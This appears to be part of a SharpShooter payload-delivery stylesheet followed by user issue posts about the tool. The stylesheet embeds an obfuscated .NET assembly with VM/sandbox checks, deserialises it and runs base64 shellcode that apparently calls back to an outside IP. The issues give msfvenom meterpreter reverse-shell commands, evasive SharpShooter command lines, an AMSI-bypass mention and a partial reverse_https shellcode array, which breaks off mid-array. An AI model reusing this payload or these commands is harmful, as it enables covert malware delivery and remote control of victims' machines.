"aWxpdHlBdHRyaWJ1dGUAZHdTdGFja1NpemUAZHdTaXplAEdVQVJEX01vZGlmaWVyZmxhZwBOT0NB"+
"Q0hFX01vZGlmaWVyZmxhZwBXUklURUNPTUJJTkVfTW9kaWZpZXJmbGFnAEZyb21CYXNlNjRTdHJp"+
"bmcAVG9TdHJpbmcAYXJnAEFzeW5jQ2FsbGJhY2sAY2FsbGJhY2sAY2hlY2sATWFyc2hhbABrZXJu"+
"ZWwzMi5kbGwAU2hhcnBTaG9vdGVyQXNzZW1ibHkuZGxsAFN5c3RlbQBFbnVtAGlzRG9tYWluAGRv"+
"bWFpbgBTeXN0ZW0uTmV0Lk5ldHdvcmtJbmZvcm1hdGlvbgBTeXN0ZW0uUmVmbGVjdGlvbgBNZW1v"+
"cnlQcm90ZWN0aW9uAENhbGxpbmdDb252ZW50aW9uAFN0cmluZ0NvbXBhcmlzb24AR28AWmVybwBD"+
"aGFyAERlYnVnZ2VyAGxwUGFyYW1ldGVyAEdldERlbGVnYXRlRm9yRnVuY3Rpb25Qb2ludGVyAFNo"+
"YXJwU2hvb3RlcgBUb0xvd2VyAC5jdG9yAFVJbnRQdHIAU3lzdGVtLkRpYWdub3N0aWNzAEdldEFs"+
"bE5ldHdvcmtJbnRlcmZhY2VzAFN5c3RlbS5SdW50aW1lLkludGVyb3BTZXJ2aWNlcwBTeXN0ZW0u"+
"UnVudGltZS5Db21waWxlclNlcnZpY2VzAERlYnVnZ2luZ01vZGVzAEdldElQR2xvYmFsUHJvcGVy"+
"dGllcwBscFRocmVhZEF0dHJpYnV0ZXMAZHdDcmVhdGlvbkZsYWdzAEVxdWFscwBDb250YWlucwBT"+
"eXN0ZW0uVGV4dC5SZWd1bGFyRXhwcmVzc2lvbnMAR2V0UGh5c2ljYWxBZGRyZXNzAGxwQWRkcmVz"+
"cwBscFN0YXJ0QWRkcmVzcwBjb250YWluc1NhbmRib3hBcnRpZmFjdHMARXhpc3RzAE9iamVjdABv"+
"YmplY3QAZmxQcm90ZWN0AG9wX0V4cGxpY2l0AEV4aXQASUFzeW5jUmVzdWx0AHJlc3VsdABFbnZp"+
"cm9ubWVudABnZXRfQ291bnQAU2hvb3QAQ29udmVydABSZWdleABTaGFycFNob290ZXJBc3NlbWJs"+
"eQBDb3B5AAAAAQBRQwA6AFwAdwBpAG4AZABvAHcAcwBcAFMAeQBzAG4AYQB0AGkAdgBlAFwARABy"+
"AGkAdgBlAHIAcwBcAFYAbQBtAG8AdQBzAGUALgBzAHkAcwAAT0MAOgBcAHcAaQBuAGQAbwB3AHMA"+
"XABTAHkAcwBuAGEAdABpAHYAZQBcAEQAcgBpAHYAZQByAHMAXAB2AG0AMwBkAGcAbAAuAGQAbABs"+
"AABNQwA6AFwAdwBpAG4AZABvAHcAcwBcAFMAeQBzAG4AYQB0AGkAdgBlAFwARAByAGkAdgBlAHIA"+
"cwBcAHYAbQBkAHUAbQAuAGQAbABsAABRQwA6AFwAdwBpAG4AZABvAHcAcwBcAFMAeQBzAG4AYQB0"+
"AGkAdgBlAFwARAByAGkAdgBlAHIAcwBcAHYAbQAzAGQAdgBlAHIALgBkAGwAbAAAT0MAOgBcAHcA"+
"aQBuAGQAbwB3AHMAXABTAHkAcwBuAGEAdABpAHYAZQBcAEQAcgBpAHYAZQByAHMAXAB2AG0AdABy"+
"AGEAeQAuAGQAbABsAABLQwA6AFwAdwBpAG4AZABvAHcAcwBcAFMAeQBzAG4AYQB0AGkAdgBlAFwA"+
"RAByAGkAdgBlAHIAcwBcAHYAbQBjAGkALgBzAHkAcwAAV0MAOgBcAHcAaQBuAGQAbwB3AHMAXABT"+
"AHkAcwBuAGEAdABpAHYAZQBcAEQAcgBpAHYAZQByAHMAXAB2AG0AdQBzAGIAbQBvAHUAcwBlAC4A"+
"cwB5AHMAAFNDADoAXAB3AGkAbgBkAG8AdwBzAFwAUwB5AHMAbgBhAHQAaQB2AGUAXABEAHIAaQB2"+
"AGUAcgBzAFwAdgBtAHgAXwBzAHYAZwBhAC4AcwB5AHMAAE9DADoAXAB3AGkAbgBkAG8AdwBzAFwA"+
"UwB5AHMAbgBhAHQAaQB2AGUAXABEAHIAaQB2AGUAcgBzAFwAdgBtAHgAbgBlAHQALgBzAHkAcwAA"+
"WUMAOgBcAHcAaQBuAGQAbwB3AHMAXABTAHkAcwBuAGEAdABpAHYAZQBcAEQAcgBpAHYAZQByAHMA"+
"XABWAE0AVABvAG8AbABzAEgAbwBvAGsALgBkAGwAbAAAT0MAOgBcAHcAaQBuAGQAbwB3AHMAXABT"+
"AHkAcwBuAGEAdABpAHYAZQBcAEQAcgBpAHYAZQByAHMAXAB2AG0AaABnAGYAcwAuAGQAbABsAABX"+
"QwA6AFwAdwBpAG4AZABvAHcAcwBcAFMAeQBzAG4AYQB0AGkAdgBlAFwARAByAGkAdgBlAHIAcwBc"+
"AHYAbQBtAG8AdQBzAGUAdgBlAHIALgBkAGwAbAAAV0MAOgBcAHcAaQBuAGQAbwB3AHMAXABTAHkA"+
"cwBuAGEAdABpAHYAZQBcAEQAcgBpAHYAZQByAHMAXAB2AG0ARwB1AGUAcwB0AEwAaQBiAC4AZABs"+
"AGwAAF9DADoAXAB3AGkAbgBkAG8AdwBzAFwAUwB5AHMAbgBhAHQAaQB2AGUAXABEAHIAaQB2AGUA"+
"cgBzAFwAVgBtAEcAdQBlAHMAdABMAGkAYgBKAGEAdgBhAC4AZABsAGwAAE9DADoAXAB3AGkAbgBk"+
"AG8AdwBzAFwAUwB5AHMAbgBhAHQAaQB2AGUAXABEAHIAaQB2AGUAcgBzAFwAdgBtAHMAYwBzAGkA"+
"LgBzAHkAcwAAVUMAOgBcAHcAaQBuAGQAbwB3AHMAXABTAHkAcwBuAGEAdABpAHYAZQBcAEQAcgBp"+
"AHYAZQByAHMAXABWAEIAbwB4AE0AbwB1AHMAZQAuAHMAeQBzAABVQwA6AFwAdwBpAG4AZABvAHcA"+
"cwBcAFMAeQBzAG4AYQB0AGkAdgBlAFwARAByAGkAdgBlAHIAcwBcAFYAQgBvAHgARwB1AGUAcwB0"+
"AC4AcwB5AHMAAE9DADoAXAB3AGkAbgBkAG8AdwBzAFwAUwB5AHMAbgBhAHQAaQB2AGUAXABEAHIA"+
"aQB2AGUAcgBzAFwAVgBCAG8AeABTAEYALgBzAHkAcwAAVUMAOgBcAHcAaQBuAGQAbwB3AHMAXABT"+
"AHkAcwBuAGEAdABpAHYAZQBcAEQAcgBpAHYAZQByAHMAXABWAEIAbwB4AFYAaQBkAGUAbwAuAHMA"+
"eQBzAABDQwA6AFwAdwBpAG4AZABvAHcAcwBcAFMAeQBzAG4AYQB0AGkAdgBlAFwAdgBiAG8AeABk"+
"AGkAcwBwAC4AZABsAGwAAENDADoAXAB3AGkAbgBkAG8AdwBzAFwAUwB5AHMAbgBhAHQAaQB2AGUA"+
"XAB2AGIAbwB4AGgAbwBvAGsALgBkAGwAbAAARUMAOgBcAHcAaQBuAGQAbwB3AHMAXABTAHkAcwBu"+
"AGEAdABpAHYAZQBcAHYAYgBvAHgAbQByAHgAbgBwAC4AZABsAGwAAEFDADoAXAB3AGkAbgBkAG8A"+
"dwBzAFwAUwB5AHMAbgBhAHQAaQB2AGUAXAB2AGIAbwB4AG8AZwBsAC4AZABsAGwAAFFDADoAXAB3"+
"AGkAbgBkAG8AdwBzAFwAUwB5AHMAbgBhAHQAaQB2AGUAXAB2AGIAbwB4AG8AZwBsAGEAcgByAGEA"+
"eQBzAHAAdQAuAGQAbABsAABNQwA6AFwAdwBpAG4AZABvAHcAcwBcAFMAeQBzAG4AYQB0AGkAdgBl"+
"AFwAdgBiAG8AeABvAGcAbABjAHIAdQB0AGkAbAAuAGQAbABsAABRQwA6AFwAdwBpAG4AZABvAHcA"+
"cwBcAFMAeQBzAG4AYQB0AGkAdgBlAFwAdgBiAG8AeABvAGcAbABlAHIAcgBvAHIAcwBwAHUALgBk"+
"AGwAbAAAV0MAOgBcAHcAaQBuAGQAbwB3AHMAXABTAHkAcwBuAGEAdABpAHYAZQBcAHYAYgBvAHgA"+
"bwBnAGwAZgBlAGUAZABiAGEAYwBrAHMAcAB1AC4AZABsAGwAAE9DADoAXAB3AGkAbgBkAG8AdwBz"+
"AFwAUwB5AHMAbgBhAHQAaQB2AGUAXAB2AGIAbwB4AG8AZwBsAHAAYQBjAGsAcwBwAHUALgBkAGwA"+
"bAAAXUMAOgBcAHcAaQBuAGQAbwB3AHMAXABTAHkAcwBuAGEAdABpAHYAZQBcAHYAYgBvAHgAbwBn"+
"AGwAcABhAHMAcwB0AGgAcgBvAHUAZwBoAHMAcAB1AC4AZABsAGwAAElDADoAXAB3AGkAbgBkAG8A"+
"dwBzAFwAUwB5AHMAbgBhAHQAaQB2AGUAXAB2AGIAbwB4AHMAZQByAHYAaQBjAGUALgBlAHgAZQAA"+
"Q0MAOgBcAHcAaQBuAGQAbwB3AHMAXABTAHkAcwBuAGEAdABpAHYAZQBcAHYAYgBvAHgAdAByAGEA"+
"eQAuAGUAeABlAABJQwA6AFwAdwBpAG4AZABvAHcAcwBcAFMAeQBzAG4AYQB0AGkAdgBlAFwAVgBC"+
"AG8AeABDAG8AbgB0AHIAbwBsAC4AZQB4AGUAAA0wADAAMABDADIAOQAADTAAMAAxAEMAMQA0AAAN"+
"MAAwADUAMAA1ADYAAA0wADAAMAA1ADYAOQAADTAAOAAwADAAMgA3AAAJLgB7ADIAfQAAByQAMAA6"+
"AAAAAADjPT+Kbg2uQYSXn8N3asUDAAQgAQEIAyAAAQUgAQEREQQgAQEOBCABAQIFIAEBEVEEAAAS"+
"ZQMgAA4HAAMCDg4RbQsHBBUSQQEOHQ4IDgUVEkEBDgQAAQIOBSABARMAAyAACBMHCBUSQQEOHQ4d"+
"EkUIEkUdDggOBQAAHRJFBCAAEnUEIAECDgYAAw4ODg4FIAEOHQMDAAACBAcBEggEAAEBCAUHAh0F"+
"GAUAAR0FDgIGGAQAARkLCAAEAR0FCBgICAABEoCZEYCdCQACEoChGBKAmQi3elxWGTTgiQQAEAAA"+
"BAAgAAAEAAAIAAQAAAAgBAAAQAAEAAAQAAQAACAABBAAAAAEIAAAAARAAAAABIAAAAAEAQAAAAQC"+
"AAAABAQAAAAECAAAAAQAAQAABAACAAAEAAQAAAQAQAAABACAAAACBgkDBhEQAwYRFAMGERgDIAAC"+
"CQAEGBgZERARFAkABhgYCRgYCRgHAAMCGAkRGAUgAgEIDgUgAgEcGAcgAhJdEmEcBSABCBJdCAEA"+
"CAAAAAAAHgEAAQBUAhZXcmFwTm9uRXhjZXB0aW9uVGhyb3dzAQgBAAIAAAAAABkBABRTaGFycFNo"+
"b290ZXJBc3NlbWJseQAAIgEAHVNoYXJwU2hvb3RlciBQYXlsb2FkIERlbGl2ZXJ5AAAFAQAAAAAX"+
"AQASTURTZWMgQWN0aXZlQnJlYWNoAAAnAQAiQ29weXJpZ2h0IMKpIE1EU2VjIENvbnN1bHRpbmcg"+
"MjAxNwAAKQEAJDU2NTk4ZjFjLTZkODgtNDk5NC1hMzkyLWFmMzM3YWJlNTc3NwAADAEABzEuMC4w"+
"LjAAAAUBAAEAAAAAAAALZIRaAAAAAAIAAAAcAQAAHD4AABwgAABSU0RTCkrXhhukXku87fvh281l"+
"6QEAAABaOlxkbWNcQ29kZVxTaGFycFNob290ZXJcU2hhcnBTaG9vdGVyXENTaGFycFNob290ZXJT"+
"dGFnZWxlc3Ncb2JqXFJlbGVhc2VcU2hhcnBTaG9vdGVyQXNzZW1ibHkucGRiAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGA/AAAAAAAAAAAAAHo/AAAAIAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAABsPwAAAAAAAAAAAAAAAF9Db3JEbGxNYWluAG1zY29yZWUuZGxs"+
"AAAAAAD/JQAgABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABABAAAAAYAACAAAAAAAAAAAAAAAAAAAABAAEAAAAwAACA"+
"AAAAAAAAAAAAAAAAAAABAAAAAABIAAAAWEAAAPgDAAAAAAAAAAAAAPgDNAAAAFYAUwBfAFYARQBS"+
"AFMASQBPAE4AXwBJAE4ARgBPAAAAAAC9BO/+AAABAAAAAQAAAAAAAAABAAAAAAA/AAAAAAAAAAQA"+
"AAACAAAAAAAAAAAAAAAAAAAARAAAAAEAVgBhAHIARgBpAGwAZQBJAG4AZgBvAAAAAAAkAAQAAABU"+
"AHIAYQBuAHMAbABhAHQAaQBvAG4AAAAAAAAAsARYAwAAAQBTAHQAcgBpAG4AZwBGAGkAbABlAEkA"+
"bgBmAG8AAAA0AwAAAQAwADAAMAAwADAANABiADAAAABUAB4AAQBDAG8AbQBtAGUAbgB0AHMAAABT"+
"AGgAYQByAHAAUwBoAG8AbwB0AGUAcgAgAFAAYQB5AGwAbwBhAGQAIABEAGUAbABpAHYAZQByAHkA"+
"AABGABMAAQBDAG8AbQBwAGEAbgB5AE4AYQBtAGUAAAAAAE0ARABTAGUAYwAgAEEAYwB0AGkAdgBl"+
"AEIAcgBlAGEAYwBoAAAAAABSABUAAQBGAGkAbABlAEQAZQBzAGMAcgBpAHAAdABpAG8AbgAAAAAA"+
"UwBoAGEAcgBwAFMAaABvAG8AdABlAHIAQQBzAHMAZQBtAGIAbAB5AAAAAAAwAAgAAQBGAGkAbABl"+
"AFYAZQByAHMAaQBvAG4AAAAAADEALgAwAC4AMAAuADAAAABSABkAAQBJAG4AdABlAHIAbgBhAGwA"+
"TgBhAG0AZQAAAFMAaABhAHIAcABTAGgAbwBvAHQAZQByAEEAcwBzAGUAbQBiAGwAeQAuAGQAbABs"+
"AAAAAABoACIAAQBMAGUAZwBhAGwAQwBvAHAAeQByAGkAZwBoAHQAAABDAG8AcAB5AHIAaQBnAGgA"+
"dAAgAKkAIABNAEQAUwBlAGMAIABDAG8AbgBzAHUAbAB0AGkAbgBnACAAMgAwADEANwAAACoAAQAB"+
"AEwAZQBnAGEAbABUAHIAYQBkAGUAbQBhAHIAawBzAAAAAAAAAAAAWgAZAAEATwByAGkAZwBpAG4A"+
"YQBsAEYAaQBsAGUAbgBhAG0AZQAAAFMAaABhAHIAcABTAGgAbwBvAHQAZQByAEEAcwBzAGUAbQBi"+
"AGwAeQAuAGQAbABsAAAAAABKABUAAQBQAHIAbwBkAHUAYwB0AE4AYQBtAGUAAAAAAFMAaABhAHIA"+
"cABTAGgAbwBvAHQAZQByAEEAcwBzAGUAbQBiAGwAeQAAAAAANAAIAAEAUAByAG8AZAB1AGMAdABW"+
"AGUAcgBzAGkAbwBuAAAAMQAuADAALgAwAC4AMAAAADgACAABAEEAcwBzAGUAbQBiAGwAeQAgAFYA"+
"ZQByAHMAaQBvAG4AAAAxAC4AMAAuADAALgAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAADAAAAwAAACMPwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAABDQAAAAQAAAAJFwAAAAkGAAAACRYAAAAGGgAAACdTeXN0ZW0uUmVmbGVjdGlvbi5Bc3Nl"+
"bWJseSBMb2FkKEJ5dGVbXSkIAAAACgsA";
var entry_class = 'SharpShooter';

try {
	setversion();
	var shell = new ActiveXObject('WScript.Shell');
	shell.popup("test");
	var stm = base64ToStream(serialized_obj);
	shell.popup("test");
	var fmt = new ActiveXObject('System.Runtime.Serialization.Formatters.Binary.BinaryFormatter');
	var al = new ActiveXObject('System.Collections.ArrayList');
	shell.popup("test");
	var n = fmt.SurrogateSelector;
	var d = fmt.Deserialize_2(stm);
	al.Add(n);
	var o = d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class);
	


	var sc = "/OiJAAAAYInlMdJki1Iwi1IMi1IUi3IoD7dKJjH/McCsPGF8Aiwgwc8NAcfi8FJXi1IQi0I8AdCLQHiFwHRKAdBQi0gYi1ggAdPjPEmLNIsB1jH/McCswc8NAcc44HX0A334O30kdeJYi1gkAdNmiwxLi1gcAdOLBIsB0IlEJCRbW2FZWlH/4FhfWosS64ZdaG5ldABod2luaVRoTHcmB//V6AAAAAAx/1dXV1dXaDpWeaf/1emkAAAAWzHJUVFqA1FRaLsBAABTUGhXiZ/G/9VQ6YwAAABbMdJSaAAyoIRSUlJTUlBo61UuO//VicaDw1BogDMAAIngagRQah9WaHVGnob/1V8x/1dXav9TVmgtBhh7/9WFwA+EygEAADH/hfZ0BIn56wloqsXiXf/VicFoRSFeMf/VMf9XagdRVlBot1fgC//VvwAvAAA5x3UHWFDpe////zH/6ZEBAADpyQEAAOhv////LzlGeWQAjTqQubyTrYyq00mM5lJWY6KJ5WC6rmdKmJF/M2/lyLRY5vCvXhZn0bXFouzlRIdE/EI4Gzhf30LN3wWzF1iU8U7qLX0p+E+2zgBVc2VyLUFnZW50OiBNb3ppbGxhLzQuMCAoY29tcGF0aWJsZTsgTVNJRSA4LjA7IFdpbmRvd3MgTlQgNS4xOyBUcmlkZW50LzQuMDsgSW5mb1BhdGguMSkNCgCAUAL1lcmYG0pfGTbaWbCZr3ucqYLQWmN+0oHSvp85E0TSLU7ahODZ5/kxQdpYYuHiiOA8+cW7ScVxHzrQLkE+0pVMV9UN4ypz1pNg8FgwOnyybZVoy3mdtON7Ima6fNiznDGq+1PlQVQvxptyv4hrDWebe4fo5x03DABlhPC9zW1Fv5N/RHmbzlRnb47XZj/TNHaJamMzGFFGfoyUazQrUz5IT2xB/KZnkBeQkNE36nZ+opHjhWlv7WyB4X52OAe/0J7n6gnD6rkgvB9Yix9GR6arOLsAaPC1olb/1WpAaAAQAABoAABAAFdoWKRT5f/Vk7kAAAAAAdlRU4nnV2gAIAAAU1ZoEpaJ4v/VhcB0xosHAcOFwHXlWMPoif3//zE3Mi4xNi4xMzIuMQA6UNWZ";
	o.Go(sc);

} catch (e) {
    debug(e.message);
}
]]>
   return nodelist.nextNode().xml;
 
   }
</msxsl:script>
<xsl:template match="/">
   <xsl:value-of select="sharp:shooter(.)"/>
</xsl:template>
</xsl:stylesheet>

Make executable.

chmod 755 SharpShooter.py

Format of raw shellcode from `msfvenom`

I'm trying to generate a shellcode for a stageless sharpshooter payload, and I can't seem to format the shellcode in a way that it likes.

If I use msfvenom -p windows/x64/meterpreter/reverse_winhttp LHOST=<host> LPORT=80 Prependmigrate=true -f raw -o meter.out
then I get an error during the interactive payload creation like

[*] Provide path to raw shellcode, e.g. ./sc.raw
./meter.out
'utf-8' codec can't decode byte 0xfc in position 0: invalid start byte

Okay, so I used the -f python and -f hex and the like, and it complains thus:

[*] Provide path to raw shellcode, e.g. ./sc.raw
./meter_hex.out
a bytes-like object is required, not 'str'

So I can't seem to satisfy its requirement. What weird thing am I doing wrong here? Or is this a python2/3 deal?

python -V  
Python 3.6.4`

Correct Reg path for AMSI commit?

I was looking at your recent commit adding the AMSI bypass for VB and JS methods, and looked for the reg path HKCU\Software\Microsoft\Windows Script\Settings\ on my 1803 Windows machine, and couldn't find it. There is a HKCU\Software\Microsoft\Windows Script Host\Settings\ key however.

Just wanted to make sure that the path wasn't in error.

[!] Missing --dotnetver argument

Hey!
I've already installed dotnet on my Kali Linux but still I can't start the SharpShooter.
When I run python SharpShooter.py It shows this error.

initial_value must be unicode or None, not str

Anyone facing this issue?

Command (e.g)
python2.7 SharpShooter.py --payload js --dotnetver 4 --stageless --rawscfile shell.txt --output test

Traceback (most recent call last):
  File "SharpShooter.py", line 599, in <module>
    ss.run(args)
  File "SharpShooter.py", line 527, in run
    payload_minified = jsmin(payload)
  File "/usr/local/lib/python2.7/dist-packages/jsmin/__init__.py", line 40, in jsmin
    ins = klass(js)
TypeError: initial_value must be unicode or None, not str

An app on your PC needs the following Windows feature

Did I miss something?

Create CobaltStrike (x32) payload like showed in the vimeo video


python SharpShooter.py --stageless --dotnetver 2 --payload vbs --output vbstest --rawscfile /root/payload32.bin --sandbox 3,4,5

       _____ __                    _____ __                __
      / ___// /_  ____ __________ / ___// /_  ____  ____  / /____  _____
      \__ \/ __ \/ __ `/ ___/ __ \__ \/ __ \/ __ \/ __ \/ __/ _ \/ ___/
     ___/ / / / / /_/ / /  / /_/ /__/ / / / / /_/ / /_/ / /_/  __/ /
    /____/_/ /_/\__,_/_/  / .___/____/_/ /_/\____/\____/\__/\___/_/
                         /_/

     Dominic Chell, @domchell, MDSec ActiveBreach, v0.2

[*] Avoiding sandbox artifacts
[*] Avoiding bad MACs
[*] Avoiding debugging
[*] Written delivery payload to output/vbstest.vbs

Execute the VBS script Windows 7 (x64): Nothing
Execute the VBS script Windows 10 (x64): An app on your PC needs the following Windows feature

Not able get a meterpreter session back to Kali VM from Win10 client (Defender OFF)

Hello,

Not sure if my msfvenom statement is correct? Never received any errors. Also, not seeing any errors after running the "python SharpShooter.py..........." command. So, when my Win10 client downloads the hta payload and Opens it, there's no call back to Meterpreter. Am I missing something here?
Thanks, Chrisandjer949

root@kali:/SharpShooter/output# msfvenom --platform windows -p windows/x64/meterpreter/reverse_https LHOST=192.168.8.10 LPORT=4444 EnableStageEncoding=True StageEncoder=x64/shikata_ga_nai -f csharp
[-] No arch selected, selecting arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 694 bytes
Final size of csharp file: 3548 bytes
byte[] buf = new byte[694] {
0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xcc,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,
0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,
0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,
0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,
0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,
0x01,0xd0,0x66,0x81,0x78,0x18,0x0b,0x02,0x0f,0x85,0x72,0x00,0x00,0x00,0x8b,
0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,0xd0,0x50,0x8b,
0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,0xff,0xc9,0x41,
0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,
0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,0x45,
0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,0x66,0x41,0x8b,
0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,0x88,0x48,0x01,
0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,
0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,0xe9,
0x4b,0xff,0xff,0xff,0x5d,0x48,0x31,0xdb,0x53,0x49,0xbe,0x77,0x69,0x6e,0x69,
0x6e,0x65,0x74,0x00,0x41,0x56,0x48,0x89,0xe1,0x49,0xc7,0xc2,0x4c,0x77,0x26,
0x07,0xff,0xd5,0x53,0x53,0x48,0x89,0xe1,0x53,0x5a,0x4d,0x31,0xc0,0x4d,0x31,
0xc9,0x53,0x53,0x49,0xba,0x3a,0x56,0x79,0xa7,0x00,0x00,0x00,0x00,0xff,0xd5,
0xe8,0x0d,0x00,0x00,0x00,0x31,0x39,0x32,0x2e,0x31,0x36,0x38,0x2e,0x38,0x2e,
0x31,0x30,0x00,0x5a,0x48,0x89,0xc1,0x49,0xc7,0xc0,0x5c,0x11,0x00,0x00,0x4d,
0x31,0xc9,0x53,0x53,0x6a,0x03,0x53,0x49,0xba,0x57,0x89,0x9f,0xc6,0x00,0x00,
0x00,0x00,0xff,0xd5,0xe8,0x8e,0x00,0x00,0x00,0x2f,0x46,0x4f,0x58,0x6d,0x70,
0x50,0x32,0x74,0x66,0x53,0x70,0x71,0x48,0x32,0x73,0x64,0x4d,0x66,0x66,0x50,
0x35,0x67,0x43,0x42,0x76,0x48,0x4e,0x73,0x72,0x79,0x4f,0x43,0x37,0x59,0x34,
0x52,0x37,0x67,0x62,0x42,0x46,0x4b,0x36,0x79,0x61,0x34,0x4f,0x72,0x46,0x43,
0x65,0x42,0x62,0x6b,0x6a,0x68,0x74,0x73,0x79,0x34,0x63,0x76,0x39,0x4e,0x58,
0x70,0x64,0x38,0x4b,0x69,0x49,0x43,0x4e,0x36,0x48,0x42,0x76,0x32,0x38,0x66,
0x4f,0x49,0x42,0x74,0x75,0x42,0x48,0x35,0x48,0x53,0x57,0x46,0x30,0x4c,0x48,
0x52,0x4b,0x5a,0x75,0x75,0x4e,0x33,0x71,0x6d,0x39,0x75,0x38,0x73,0x4d,0x36,
0x50,0x56,0x52,0x61,0x52,0x5a,0x33,0x34,0x79,0x68,0x35,0x42,0x78,0x50,0x4d,
0x71,0x59,0x77,0x57,0x46,0x37,0x4e,0x75,0x49,0x70,0x37,0x2d,0x72,0x56,0x52,
0x00,0x48,0x89,0xc1,0x53,0x5a,0x41,0x58,0x4d,0x31,0xc9,0x53,0x48,0xb8,0x00,
0x32,0xa0,0x84,0x00,0x00,0x00,0x00,0x50,0x53,0x53,0x49,0xc7,0xc2,0xeb,0x55,
0x2e,0x3b,0xff,0xd5,0x48,0x89,0xc6,0x6a,0x0a,0x5f,0x48,0x89,0xf1,0x6a,0x1f,
0x5a,0x52,0x68,0x80,0x33,0x00,0x00,0x49,0x89,0xe0,0x6a,0x04,0x41,0x59,0x49,
0xba,0x75,0x46,0x9e,0x86,0x00,0x00,0x00,0x00,0xff,0xd5,0x4d,0x31,0xc0,0x53,
0x5a,0x48,0x89,0xf1,0x4d,0x31,0xc9,0x4d,0x31,0xc9,0x53,0x53,0x49,0xc7,0xc2,
0x2d,0x06,0x18,0x7b,0xff,0xd5,0x85,0xc0,0x75,0x1f,0x48,0xc7,0xc1,0x88,0x13,
0x00,0x00,0x49,0xba,0x44,0xf0,0x35,0xe0,0x00,0x00,0x00,0x00,0xff,0xd5,0x48,
0xff,0xcf,0x74,0x02,0xeb,0xaa,0xe8,0x55,0x00,0x00,0x00,0x53,0x59,0x6a,0x40,
0x5a,0x49,0x89,0xd1,0xc1,0xe2,0x10,0x49,0xc7,0xc0,0x00,0x10,0x00,0x00,0x49,
